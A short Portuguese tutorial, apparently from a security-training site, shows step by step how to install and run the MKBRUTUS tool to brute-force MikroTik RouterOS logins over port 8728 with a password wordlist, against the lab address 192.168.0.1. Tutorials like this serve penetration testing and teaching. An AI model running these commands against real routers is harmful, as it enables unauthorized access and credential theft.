O MKBRUTUS é uma ferramenta desenvolvida em python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Projeto: github.com/mkbrutusproject/mkbrutus

01 - Passo

Verifique a versão atual do python em seguida realiza a instalação da versão 3.

  Linux
python –version

apt-get install python3

02 - Passo

Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.

  Linux
python –-version

03 - Passo

Realize o download do projeto MKBRUTUS.

  Linux
git clone https://github.com/mkbrutusproject/mkbrutus

04 - Passo

Altere as permissões do diretório MKBRUTUS e liste o conteúdo do diretório.

  Linux
chmod -R 755 mkbrutus/

cd mkbrutus/

ls -l

05 - Passo

Execute a ferramenta seguindo do parâmetro -h para visualizar as opções de ajuda.

  Linux
python3 mkbrutus.py -h

06 - Passo

Crie um arquivo de senhas ou realize o download de uma lista nos sites:

Lista : wiki.skullsecurity.org/Passwords

Lista : wordlist.sourceforge.net

  Linux
vim senhas.txt

07 - Passo

Realize o ataque no equipamento utilizando os seguintes parâmetros.

mkbrutus.py : Ferramenta de Brute Force

192.168.0.1 : IP do Roteador MikroTik

senhas.txt : Arquivo de Senhas(Wordlist)

O ataque é realizado com sucesso e o usuário e a senha são revelados:

  Linux
python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt


  Autor

Marcos Henrique

 São Paulo/SP



  Ataques de Senhas

© 2020 - 100SECURITY

Contato